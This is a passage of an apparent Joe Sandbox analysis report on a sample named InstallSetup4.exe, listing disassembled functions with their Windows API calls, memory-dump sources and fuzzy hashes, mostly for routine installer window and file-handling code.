                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405314
                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405338
                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405358
                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 0040536D
                                                                                            • GlobalFree.KERNEL32(?), ref: 0040537D
                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F6
                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040549F
                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AE
                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004054D9
                                                                                            • ShowWindow.USER32(?,00000000), ref: 00405527
                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 00405532
                                                                                            • ShowWindow.USER32(00000000), ref: 00405539
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                            • String ID: $M$N
                                                                                            • API String ID: 2564846305-813528018
                                                                                            • Opcode ID: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
                                                                                            • Instruction ID: 91097811874ce85ba3cc7540bcf7dd58db25a3d6f071223140e4d1ec27d7ea12
                                                                                            • Opcode Fuzzy Hash: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
                                                                                            • Instruction Fuzzy Hash: 6C029C70900608AFDF20DF94DD85AAF7BB5FB85314F10817AE611BA2E1D7798A41CF58
                                                                                            Function 00403FD7 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404013
                                                                                            • ShowWindow.USER32(?), ref: 00404033
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404045
                                                                                            • ShowWindow.USER32(?,00000004), ref: 0040405E
                                                                                            • DestroyWindow.USER32 ref: 00404072
                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040408B
                                                                                            • GetDlgItem.USER32(?,?), ref: 004040AA
                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BE
                                                                                            • IsWindowEnabled.USER32(00000000), ref: 004040C5
                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00404170
                                                                                            • GetDlgItem.USER32(?,00000002), ref: 0040417A
                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00404194
                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E5
                                                                                            • GetDlgItem.USER32(?,00000003), ref: 0040428B
                                                                                            • ShowWindow.USER32(00000000,?), ref: 004042AC
                                                                                            • EnableWindow.USER32(?,?), ref: 004042BE
                                                                                            • EnableWindow.USER32(?,?), ref: 004042D9
                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EF
                                                                                            • EnableMenuItem.USER32(00000000), ref: 004042F6
                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430E
                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404321
                                                                                            • lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040434B
                                                                                            • SetWindowTextW.USER32(?,0042CA68), ref: 0040435F
                                                                                            • ShowWindow.USER32(?,0000000A), ref: 00404493
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 1860320154-0
                                                                                            • Opcode ID: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
                                                                                            • Instruction ID: 911e0a6aef898d83942fe666095560f38e6effa11f08765efd6836b1f10f2e9c
                                                                                            • Opcode Fuzzy Hash: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
                                                                                            • Instruction Fuzzy Hash: 29C1B0B1500204BBDB206F61EE89A2B3A68FB85756F01053EF781B51F0CB3958929B2D
                                                                                            Function 00404695 Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 204windowstringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404733
                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404747
                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404764
                                                                                            • GetSysColor.USER32(?), ref: 00404775
                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404783
                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404791
                                                                                            • lstrlenW.KERNEL32(?), ref: 00404796
                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A3
                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B8
                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 00404811
                                                                                            • SendMessageW.USER32(00000000), ref: 00404818
                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404843
                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404886
                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00404894
                                                                                            • SetCursor.USER32(00000000), ref: 00404897
                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 004048B0
                                                                                            • SetCursor.USER32(00000000), ref: 004048B3
                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048E2
                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                            • String ID: N
                                                                                            • API String ID: 3103080414-1130791706
                                                                                            • Opcode ID: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
                                                                                            • Instruction ID: 3ad42440e7936429012ccc374b67200ab01768f99e4ad58672f49272ac14a637
                                                                                            • Opcode Fuzzy Hash: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
                                                                                            • Instruction Fuzzy Hash: 2E6181B1900209BFDB10AF60DD85EAA7B69FB84315F00853AFA05B62D0C779A951DF98
                                                                                            Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                            • DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                            • String ID: F
                                                                                            • API String ID: 941294808-1304234792
                                                                                            • Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                                                            • Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
                                                                                            • Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                                                            • Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4
                                                                                            Function 0040619D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406338,?,?), ref: 004061D8
                                                                                            • GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 004061E1
                                                                                              • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
                                                                                              • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
                                                                                            • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061FE
                                                                                            • wsprintfA.USER32 ref: 0040621C
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406257
                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406266
                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629E
                                                                                            • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F4
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00406305
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040630C
                                                                                              • Part of subcall function 00406047: GetFileAttributesW.KERNEL32(00000003,004030C2,C:\Users\user\AppData\Local\Temp\InstallSetup4.exe,80000000,00000003), ref: 0040604B
                                                                                              • Part of subcall function 00406047: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                            • String ID: %ls=%ls$[Rename]
                                                                                            • API String ID: 2171350718-461813615
                                                                                            • Opcode ID: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
                                                                                            • Instruction ID: 2f157a22eecee44515c187ff3daf75b9e7e255f904fde787f0dd9ddf92a1116e
                                                                                            • Opcode Fuzzy Hash: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
                                                                                            • Instruction Fuzzy Hash: C9312271200315BBD2206B619D49F2B3A5CEF85718F16043EFD42FA2C2DB7D99258ABD
                                                                                            Function 00406594 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 204stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSystemDirectoryW.KERNEL32(004326A0,00000400), ref: 004066B6
                                                                                            • GetWindowsDirectoryW.KERNEL32(004326A0,00000400,00000000,0042BA48,?,?,00000000,00000000,00428E20,76F923A0), ref: 004066CC
                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,004326A0), ref: 0040672A
                                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406733
                                                                                            • lstrcatW.KERNEL32(004326A0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040675E
                                                                                            • lstrlenW.KERNEL32(004326A0,00000000,0042BA48,?,?,00000000,00000000,00428E20,76F923A0), ref: 004067B8
                                                                                            Strings
                                                                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406687
                                                                                            • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406758
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                            • API String ID: 4024019347-730719616
                                                                                            • Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                                                            • Instruction ID: fc62ecdfc612bfadb4c03fc2fb2820e4449372332e166df7cb208319b666a0da
                                                                                            • Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                                                            • Instruction Fuzzy Hash: 7D612571A046009BD720AF24DD84B6A76E8EF95328F16053FF643B32D0DB7C9961875E
                                                                                            Function 0040453D Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 0040455A
                                                                                            • GetSysColor.USER32(00000000), ref: 00404598
                                                                                            • SetTextColor.GDI32(?,00000000), ref: 004045A4
                                                                                            • SetBkMode.GDI32(?,?), ref: 004045B0
                                                                                            • GetSysColor.USER32(?), ref: 004045C3
                                                                                            • SetBkColor.GDI32(?,?), ref: 004045D3
                                                                                            • DeleteObject.GDI32(?), ref: 004045ED
                                                                                            • CreateBrushIndirect.GDI32(?), ref: 004045F7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2320649405-0
                                                                                            • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                            • Instruction ID: 069c4eaec478219780f05c004fc5973679282d3c2eb16bc8cec9dcb23997e36d
                                                                                            • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                            • Instruction Fuzzy Hash: 592151B1500704ABCB20DF68DE08A5B7BF8AF41714B05892EEA96A22E0D739E944CF54
                                                                                            Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
                                                                                              • Part of subcall function 00406128: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040613E
                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                            • String ID: 9
                                                                                            • API String ID: 163830602-2366072709
                                                                                            • Opcode ID: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                                                                            • Instruction ID: e892b7cb172a86a35cdf2d5061c859a119b49b65f2ae0b0c69c9b35c58dd84de
                                                                                            • Opcode Fuzzy Hash: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                                                                            • Instruction Fuzzy Hash: F151FB75D0411AABDF24DFD4CA85AAEBBB9FF04344F10817BE901B62D0D7B49D828B58
                                                                                            Function 004055DC Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(0042BA48,00000000,00428E20,76F923A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                            • lstrlenW.KERNEL32(0040341D,0042BA48,00000000,00428E20,76F923A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                            • lstrcatW.KERNEL32(0042BA48,0040341D), ref: 00405637
                                                                                            • SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                            • String ID:
                                                                                            • API String ID: 2531174081-0
                                                                                            • Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                                                            • Instruction ID: 906fe2e33ec339045028823105f1a28636d6cdc7c4a53a0106b9bb612f22f5f3
                                                                                            • Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                                                            • Instruction Fuzzy Hash: 9121A171900158BACB119F65DD449CFBFB4EF45350F50843AF508B62A0C3794A50CFA8
                                                                                            Function 00406805 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,0043F000,76F93420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                                                                            • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                                                                            • CharNextW.USER32(?,0043F000,76F93420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                                                                            • CharPrevW.USER32(?,?,76F93420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: Char$Next$Prev
                                                                                            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 589700163-3250253040
                                                                                            • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                            • Instruction ID: fa9c0ef9ae643832d728fa0671e6943ea0b093c18f887e6db6f7fe1f852dcfd9
                                                                                            • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                            • Instruction Fuzzy Hash: F111932780221299DB303B148C40E7766E8AF54794F52C43FED8A722C0F77C4C9286AD
                                                                                            Function 00404E91 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EAC
